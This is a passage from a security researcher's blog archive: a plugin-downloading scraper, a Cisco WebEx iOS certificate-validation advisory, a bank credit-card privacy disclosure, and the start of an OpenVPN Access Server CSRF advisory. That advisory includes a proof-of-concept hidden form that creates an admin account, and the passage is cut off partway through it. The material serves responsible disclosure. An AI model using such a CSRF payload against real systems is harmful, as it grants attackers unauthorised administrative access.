				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e78088db566297466-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-2">2</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-4">4</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-6">6</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-8">8</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-10">10</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-12">12</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-14">14</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-15">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-16">16</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-18">18</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-19">19</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-20">20</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-21">21</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-22">22</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-23">23</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-24">24</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-25">25</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e78088db566297466-26">26</div><div class="crayon-num" data-line="crayon-53c98e78088db566297466-27">27</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e78088db566297466-1"><span class="crayon-st">from</span><span class="crayon-h"> </span><span class="crayon-e">bs4 </span><span class="crayon-r">import</span><span class="crayon-h"> </span><span class="crayon-o">*</span><span class="crayon-h"> </span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-2"><span class="crayon-r">import</span><span class="crayon-h"> </span><span class="crayon-k ">urllib</span></div><div class="crayon-line" id="crayon-53c98e78088db566297466-3"><span class="crayon-r">import</span><span class="crayon-h"> </span><span class="crayon-k ">os</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-4"><span class="crayon-st">from</span><span class="crayon-h"> </span><span class="crayon-k ">urlparse</span><span class="crayon-h"> </span><span class="crayon-r">import</span><span class="crayon-h"> </span><span class="crayon-e">urlsplit</span></div><div class="crayon-line" id="crayon-53c98e78088db566297466-5"><span class="crayon-r">import</span><span class="crayon-h"> </span><span class="crayon-k ">argparse</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-6">&nbsp;</div><div class="crayon-line" id="crayon-53c98e78088db566297466-7"><span class="crayon-r">def</span><span class="crayon-h"> </span><span class="crayon-e">main</span><span class="crayon-sy">(</span><span class="crayon-i">args</span><span class="crayon-sy">)</span><span class="crayon-o">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-8"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">if</span><span class="crayon-h"> </span><span class="crayon-st">not</span><span class="crayon-h"> </span><span class="crayon-k ">os.path</span><span class="crayon-sy">.</span><span class="crayon-e">exists</span><span class="crayon-sy">(</span><span class="crayon-v">args</span><span class="crayon-sy">.</span><span class="crayon-i">output</span><span class="crayon-sy">)</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-53c98e78088db566297466-9"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-k ">os</span><span class="crayon-sy">.</span><span class="crayon-e">makedirs</span><span class="crayon-sy">(</span><span class="crayon-v">args</span><span class="crayon-sy">.</span><span class="crayon-i">output</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-10">&nbsp;</div><div class="crayon-line" id="crayon-53c98e78088db566297466-11"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">for</span><span class="crayon-h"> </span><span class="crayon-e">pageNumber </span><span class="crayon-st">in</span><span class="crayon-h"> </span><span class="crayon-k ">xrange</span><span class="crayon-sy">(</span><span class="crayon-v">args</span><span class="crayon-sy">.</span><span class="crayon-i">pages</span><span class="crayon-sy">)</span><span class="crayon-o">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-12"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">page</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-e">BeautifulSoup</span><span class="crayon-sy">(</span><span class="crayon-k ">urllib</span><span class="crayon-sy">.</span><span class="crayon-e">urlopen</span><span class="crayon-sy">(</span><span class="crayon-s">"http://wordpress.org/extend/plugins/browse/popular/page/"</span><span class="crayon-h"> </span><span class="crayon-sy">\</span></div><div class="crayon-line" id="crayon-53c98e78088db566297466-13"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-o">+</span><span class="crayon-h"> </span><span class="crayon-k ">str</span><span class="crayon-sy">(</span><span class="crayon-i">pageNumber</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">read</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-14"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">for</span><span class="crayon-h"> </span><span class="crayon-i">x</span><span class="crayon-h"> </span><span class="crayon-st">in</span><span class="crayon-h"> </span><span class="crayon-v">page</span><span class="crayon-sy">.</span><span class="crayon-e">findAll</span><span class="crayon-sy">(</span><span class="crayon-s">'div'</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-sy">{</span><span class="crayon-s">'class'</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-s">'plugin-block'</span><span class="crayon-sy">}</span><span class="crayon-sy">)</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-53c98e78088db566297466-15"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">if</span><span class="crayon-h"> </span><span class="crayon-k ">int</span><span class="crayon-sy">(</span><span class="crayon-k ">filter</span><span class="crayon-sy">(</span><span class="crayon-r">lambda</span><span class="crayon-h"> </span><span class="crayon-i">y</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">y</span><span class="crayon-sy">.</span><span class="crayon-e">isdigit</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-k ">str</span><span class="crayon-sy">(</span><span class="crayon-v">x</span><span class="crayon-sy">.</span><span class="crayon-v">ul</span><span class="crayon-sy">.</span><span class="crayon-e">findAll</span><span class="crayon-sy">(</span><span class="crayon-s">'li'</span><span class="crayon-sy">)</span><span class="crayon-sy">[</span><span class="crayon-cn">2</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-o">&gt;</span><span class="crayon-h"> </span><span class="crayon-v">args</span><span class="crayon-sy">.</span><span class="crayon-i">downloads</span><span class="crayon-o">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-16"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">downloadLink</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-e">BeautifulSoup</span><span class="crayon-sy">(</span><span class="crayon-k ">urllib</span><span class="crayon-sy">.</span><span class="crayon-e">urlopen</span><span class="crayon-sy">(</span><span class="crayon-v">x</span><span class="crayon-sy">.</span><span class="crayon-v">h3</span><span class="crayon-sy">.</span><span class="crayon-v">a</span><span class="crayon-sy">[</span><span class="crayon-s">'href'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">read</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">\</span></div><div class="crayon-line" id="crayon-53c98e78088db566297466-17"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-sy">.</span><span class="crayon-e">find</span><span class="crayon-sy">(</span><span class="crayon-s">'p'</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-sy">{</span><span class="crayon-s">'class'</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-s">'button'</span><span class="crayon-sy">}</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-v">a</span><span class="crayon-sy">[</span><span class="crayon-s">'href'</span><span class="crayon-sy">]</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-18"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-k ">urllib</span><span class="crayon-sy">.</span><span class="crayon-e">urlretrieve</span><span class="crayon-sy">(</span><span class="crayon-i">downloadLink</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">args</span><span class="crayon-sy">.</span><span class="crayon-i">output</span><span class="crayon-h"> </span><span class="crayon-o">+</span><span class="crayon-h"> </span><span class="crayon-k ">os.path</span><span class="crayon-sy">.</span><span class="crayon-e">basename</span><span class="crayon-sy">(</span><span class="crayon-e">urlsplit</span><span class="crayon-sy">(</span><span class="crayon-i">downloadLink</span><span class="crayon-sy">)</span><span class="crayon-sy">[</span><span class="crayon-cn">2</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e78088db566297466-19"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-k ">print</span><span class="crayon-h"> </span><span class="crayon-s">"Downloaded %s"</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-h"> </span><span class="crayon-k ">os.path</span><span class="crayon-sy">.</span><span class="crayon-e">basename</span><span class="crayon-sy">(</span><span class="crayon-e">urlsplit</span><span class="crayon-sy">(</span><span class="crayon-i">downloadLink</span><span class="crayon-sy">)</span><span class="crayon-sy">[</span><span class="crayon-cn">2</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-20">&nbsp;</div><div class="crayon-line" id="crayon-53c98e78088db566297466-21"><span class="crayon-st">if</span><span class="crayon-h"> </span><span class="crayon-v">__name__</span><span class="crayon-h"> </span><span class="crayon-o">==</span><span class="crayon-h"> </span><span class="crayon-s">"__main__"</span><span class="crayon-o">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-22"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-k ">parser</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">argparse</span><span class="crayon-sy">.</span><span class="crayon-e">ArgumentParser</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e78088db566297466-23"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-k ">parser</span><span class="crayon-sy">.</span><span class="crayon-e">add_argument</span><span class="crayon-sy">(</span><span class="crayon-s">"-d"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">"--downloads"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-k ">help</span><span class="crayon-o">=</span><span class="crayon-s">"Minimum number of plugin downloads"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">default</span><span class="crayon-o">=</span><span class="crayon-cn">100000</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-k ">type</span><span class="crayon-o">=</span><span class="crayon-k ">int</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-24"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-k ">parser</span><span class="crayon-sy">.</span><span class="crayon-e">add_argument</span><span class="crayon-sy">(</span><span class="crayon-s">"-o"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">"--output"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-k ">help</span><span class="crayon-o">=</span><span class="crayon-s">"Output folder"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">default</span><span class="crayon-o">=</span><span class="crayon-s">""</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-k ">type</span><span class="crayon-o">=</span><span class="crayon-k ">str</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e78088db566297466-25"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-k ">parser</span><span class="crayon-sy">.</span><span class="crayon-e">add_argument</span><span class="crayon-sy">(</span><span class="crayon-s">"-p"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">"--pages"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-k ">help</span><span class="crayon-o">=</span><span class="crayon-s">"Number of pages to parse"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">default</span><span class="crayon-o">=</span><span class="crayon-cn">250</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-k ">type</span><span class="crayon-o">=</span><span class="crayon-k ">int</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e78088db566297466-26"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">args</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">parser</span><span class="crayon-sy">.</span><span class="crayon-e">parse_args</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e78088db566297466-27"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-e">main</span><span class="crayon-sy">(</span><span class="crayon-i">args</span><span class="crayon-sy">)</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0144 seconds] -->
<p>Thanks to the team behind BSides RI for giving me the chance to present my technique and research used for finding these vulnerabilities. I&#8217;d encourage anybody to not only go to a BSides near you, but also have a go at finding vulnerabilities in WordPress plugins. It&#8217;s a ton of fun!</p>
					</div><!-- .entry-content -->
	
	<footer class="entry-meta">
										<span class="cat-links">
				Posted in <a href="https://charlieeriksen.github.io/category/security/" title="View all posts in Security" rel="category tag">Security</a>			</span>
			<span class="sep"> / </span>			
						
						<span class="tag-links">
				Tagged <a href="https://charlieeriksen.github.io/tag/wordpress/" rel="tag">Wordpress</a>, <a href="https://charlieeriksen.github.io/tag/wordpress-plugins/" rel="tag">Wordpress Plugins</a>			</span>
			<span class="sep"> / </span>
							
				<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/06/18/bsides-rhode-island-presentation-and-slides/#respond" title="Comment on BSides Rhode Island presentation and slides">Leave a comment</a></span>
		<span class="sep"> / </span>
				
					</footer><!-- #entry-meta -->
</article><!-- #post-276 -->

				
					
<article id="post-268" class="post-268 post type-post status-publish format-standard hentry category-advisories tag-cisco">
	<header class="entry-header">
				<div class="entry-meta">
			<a href="https://charlieeriksen.github.io/2013/05/24/cve-2012-6399-or-how-your-cisco-webex-meetings-arent-very-confidential-on-ios/" title="4:19 pm" rel="bookmark" class="entry-date"><time datetime="2013-05-24T16:19:42+00:00" pubdate>May 24, 2013</time></a> by Charlie Eriksen		</div><!-- .entry-meta -->
		<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/05/24/cve-2012-6399-or-how-your-cisco-webex-meetings-arent-very-confidential-on-ios/" title="Permalink to CVE-2012-6399 &#8211; Or how your Cisco WebEx meetings aren&#8217;t very confidential on iOS" rel="bookmark">CVE-2012-6399 &#8211; Or how your Cisco WebEx meetings aren&#8217;t very confidential on iOS</a></h2>

				
					</header><!-- .entry-header -->
	

		<div class="entry-content">
				<p><strong>Advisory</strong></p>
<p><a href=" http://secunia.com/advisories/51412/">Secunia SA 51412</a></p>
<p><strong>Information</strong></p>
<p>By default, when creating a connection using iOS you will get a nice helpful warning if you stumble upon a certificate chain that can&#8217;t be verified:</p>
<div id="attachment_269" style="width: 231px" class="wp-caption alignnone"><a href="http://www.dhanjani.com/blog/2010/12/intercepting-ssl-connections-on-ios-and-secure-coding-against-mitm.html"><img class="size-full wp-image-269 " alt="iOS Certifiate Warning" src="https://charlieeriksen.github.io/wp-content/uploads/2013/05/ioscertwarning.png" width="221" height="430" /></a><p class="wp-caption-text">Source: <a href="http://www.dhanjani.com/blog/2010/12/intercepting-ssl-connections-on-ios-and-secure-coding-against-mitm.html">http://www.dhanjani.com</a><br />Contains other great information about the subject as well.</p></div>
<p>However some applications <a href="http://www.dhanjani.com/blog/2010/12/intercepting-ssl-connections-on-ios-and-secure-coding-against-mitm.html">override this functionality</a>. In the case, an unfixed vulnerability submitted through <a href="http://secunia.com/community/research/svcrp/">Secunia SVCRP</a> reached its 6 month limit as per <a href="http://secunia.com/community/research/policy/">Secunia&#8217;s disclosure policy</a>. This means that a MITM can replace the certificate on the connection and decrypt the traffic without the user knowing, leading to a loss of confidentiality.</p>
<p>It&#8217;s also interesting to note when you authenticate with the WebEx service, that as you can see below from this burp screenshot, it submits your credentials to not just one, but two WebEx servers; one in the USA, and one in Beijing in China. You&#8217;ve got to wonder what the purpose is of that, though I won&#8217;t speculate about that:</p>
<div id="attachment_270" style="width: 1105px" class="wp-caption alignnone"><a href="https://charlieeriksen.github.io/wp-content/uploads/2013/05/webexchina.png"><img class="size-full wp-image-270" alt="WebEx submitting your credentials to China" src="https://charlieeriksen.github.io/wp-content/uploads/2013/05/webexchina.png" width="1095" height="525" /></a><p class="wp-caption-text">WebEx submitting your credentials to China</p></div>
					</div><!-- .entry-content -->
	
	<footer class="entry-meta">
										<span class="cat-links">
				Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a>			</span>
			<span class="sep"> / </span>			
						
						<span class="tag-links">
				Tagged <a href="https://charlieeriksen.github.io/tag/cisco/" rel="tag">Cisco</a>			</span>
			<span class="sep"> / </span>
							
				<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/05/24/cve-2012-6399-or-how-your-cisco-webex-meetings-arent-very-confidential-on-ios/#comments" title="Comment on CVE-2012-6399 &#8211; Or how your Cisco WebEx meetings aren&#8217;t very confidential on iOS">1 Comment</a></span>
		<span class="sep"> / </span>
				
					</footer><!-- #entry-meta -->
</article><!-- #post-268 -->

				
					
<article id="post-263" class="post-263 post type-post status-publish format-standard hentry category-privacy">
	<header class="entry-header">
				<div class="entry-meta">
			<a href="https://charlieeriksen.github.io/2013/05/16/credit-card-numbers-third-parties-and-you/" title="10:35 am" rel="bookmark" class="entry-date"><time datetime="2013-05-16T10:35:45+00:00" pubdate>May 16, 2013</time></a> by Charlie Eriksen		</div><!-- .entry-meta -->
		<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/05/16/credit-card-numbers-third-parties-and-you/" title="Permalink to Credit card numbers, third parties and you" rel="bookmark">Credit card numbers, third parties and you</a></h2>

				
					</header><!-- .entry-header -->
	

		<div class="entry-content">
				<div>
<p>One part of the preparation for my upcoming talk at BSides RI involved shuffling some cash from my bank account to make it available on my credit card. While in this process, something struck me as rather odd, as seen on the following Burp output:</p>
</div>
<div id="attachment_264" style="width: 917px" class="wp-caption alignnone"><a href="https://charlieeriksen.github.io/wp-content/uploads/2013/05/request1.png"><img class="size-full wp-image-264" alt="Request containing credit card number" src="https://charlieeriksen.github.io/wp-content/uploads/2013/05/request1.png" width="907" height="148" /></a><p class="wp-caption-text">Request containing credit card number</p></div>
<p>As we can see, the URL query string contains a parameter identified as &#8220;KortNo”. And this just so happens to contain what is in fact my credit card number. So the question becomes, is this a big deal? Well, this had me wondering and looking at it from a PCI perspective; I think there may be some cause for concern.</p>
<h1>Access logs, browser history</h1>
<p>It’s of course common practice for companies to keep access logs for all HTTP servers in the event of a system breach for forensic purposes. PCI has a mandate for companies to retain at least 1 year worth of &#8220;logs&#8221;. Because PCI mandates logs are kept, you are 99% likely as a bank to keep your HTTP logs, including the URL requested. In this instance, we make a request with data that PCI has a strong view upon the storage of, including the very explicit requirement of encrypting the PAN(Primary account number), CVV2, expiration date, and any other personally identifiable information if you store the 3 former.</p>
<p>So what happens when you make a HTTP GET request containing data which PCI mandates the encryption of, and it goes into a standard IIS log? Well, you are storing data in violation of PCI compliance. You will only need to get your hands on the access logs from the server to now access a lot of credit card data. This is rather unfortunate.</p>
<p>Even more likely, is that your personal browser history will now contain your credit card number and hang on to it. Of course, this requires some social engineering to be relevant. However, if this is not made known to the user, then this is a cause for concern.</p>
<h1>Third parties</h1>
<p>Of course, when you run a web site, you like to track user behavior on your site. Who doesn&#8217;t? Banks do, and in this case, the above concerns are amplified when I noticed this request having been made by my browser at the same time:</p>
<div id="attachment_265" style="width: 946px" class="wp-caption alignnone"><a href="https://charlieeriksen.github.io/wp-content/uploads/2013/05/request2.png"><img class="size-full wp-image-265" alt="Request to google analytics" src="https://charlieeriksen.github.io/wp-content/uploads/2013/05/request2.png" width="936" height="228" /></a><p class="wp-caption-text">Request to google analytics</p></div>
<p>What you see here is a standard Google analytics callback. We see that our query string containing data that PCI mandates that you must ensure is stored correctly is now sent off to a third-party. That is Google in this case. Ok, we may trust Google, but it also means that anybody with access to the Google analytics account now can view this credit card data. That means that this bank will now have to explicitly have made a contract with Google to verify that they will safe-keep this PCI data.</p>
<p>Is that likely? Not really. This is just an unfortunate side-effect of the bad practice of using the straight up PAN(Credit card number) as a part of the request through a query-string.</p>
<h1>Putting it into perspective</h1>
<p>When I discovered this, I rushed over to my other bank account(with a different back) to check if a similar problem existed over there. I observed that they had made the seemingly explicit design decision of not using the credit card number. Rather, they used a hash and a GUID to identify my credit card. While they were using a third-party analytics service, it did not contain personal information to the extent the above did as a result, which mitigates potential concerns in this regard.</p>
<h1>Timeline</h1>
<ul>
<li>13/05/2013 – Advisory sent to CERT</li>
<li>13/05/2013 – CERT confirms receipt of advisory, promises to provide contact at vendor</li>
<li>14/05/2013 – CERT still searching for appropriate vendor point of contact</li>
<li>15/05/2013 – CERT provides point of contact</li>
<li>15/05/2013 – Advisory sent to vendor</li>
<li>15/05/2013 &#8211; Vendor response confirming issue</li>
<li>15/05/2013 &#8211; Vendor deploys fix</li>
<li>16/05/2013 &#8211; Advisory published</li>
</ul>
<p>It should be noted that the bank in question was quick to respond and fix the privacy concern in a professional manner. I&#8217;ve redacted the name of the bank as the goal of this was to highlight a potential pitfall that others may fall into, and hopefully this may encourage other banks to ensure that this is not a concern in their systems as well.</p>
					</div><!-- .entry-content -->
	
	<footer class="entry-meta">
										<span class="cat-links">
				Posted in <a href="https://charlieeriksen.github.io/category/privacy/" title="View all posts in Privacy" rel="category tag">Privacy</a>			</span>
			<span class="sep"> / </span>			
						
							
				<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/05/16/credit-card-numbers-third-parties-and-you/#respond" title="Comment on Credit card numbers, third parties and you">Leave a comment</a></span>
		<span class="sep"> / </span>
				
					</footer><!-- #entry-meta -->
</article><!-- #post-263 -->

				
					
<article id="post-256" class="post-256 post type-post status-publish format-standard hentry category-advisories category-security tag-csrf tag-openvpn">
	<header class="entry-header">
				<div class="entry-meta">
			<a href="https://charlieeriksen.github.io/2013/05/09/cve-2013-2692-or-when-your-openvpn-is-a-bit-too-open/" title="12:33 am" rel="bookmark" class="entry-date"><time datetime="2013-05-09T00:33:11+00:00" pubdate>May 9, 2013</time></a> by Charlie Eriksen		</div><!-- .entry-meta -->
		<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/05/09/cve-2013-2692-or-when-your-openvpn-is-a-bit-too-open/" title="Permalink to CVE-2013-2692 &#8211; Or when your OpenVPN is a bit too open" rel="bookmark">CVE-2013-2692 &#8211; Or when your OpenVPN is a bit too open</a></h2>

				
					</header><!-- .entry-header -->
	

		<div class="entry-content">
				<p><strong>Advisories</strong></p>
<p><a href="http://openvpn.net/index.php/access-server/download-openvpn-as/531-release-notes-v185.html">OpenVPN</a></p>
<p><a href="http://secunia.com/advisories/52802">Secunia</a></p>
<p><strong>Details</strong></p>
<p>When analyzing the <a href="http://openvpn.net/index.php/access-server/download-openvpn-as-vm/164.html?osfamily=Virtual%20Appliance%20(VMWare)&amp;ex=1">OpenVPN Access Server</a>, it quickly became apparent that the administration interface lacked any basic level of CSRF protection, which was easily demonstrated with a CSRF form like this, which will add a new user with admin privileges, using the username &#8220;csrfaccount&#8221; and password &#8220;qweasd&#8221;:</p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e7808da5567114753" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
&lt;form action="https://192.168.1.133/admin/user_permissions" method="POST" enctype="multipart/form-data"&gt;
  &lt;input type="hidden" name="search" value="&amp;#13;" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;openvpn&amp;#58;conn&amp;#95;group" value="None" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;openvpn&amp;#58;pvt&amp;#95;password&amp;#95;digest" value="&amp;#13;" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;openvpn&amp;#58;dynstatic" value="true" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;openvpn&amp;#58;conn&amp;#95;ip" value="&amp;#13;" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;openvpn&amp;#58;s2c&amp;#95;route&amp;#95;type" value="nat" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;openvpn&amp;#58;s2c&amp;#95;routes" value="&amp;#13;" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;openvpn&amp;#58;gwyesno" value="no" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;openvpn&amp;#58;c2s&amp;#95;routes" value="&amp;#13;" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;openvpn&amp;#58;dmzyesno" value="no" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;openvpn&amp;#58;dmz&amp;#95;ip" value="&amp;#13;" /&gt;
  &lt;input type="hidden" name="new&amp;#95;username" value="csrfaccount" /&gt;
  &lt;input type="hidden" name="edit&amp;#58;&amp;#37;NEW&amp;#37;USER&amp;#37;&amp;#58;conn&amp;#95;group" value="None" /&gt;
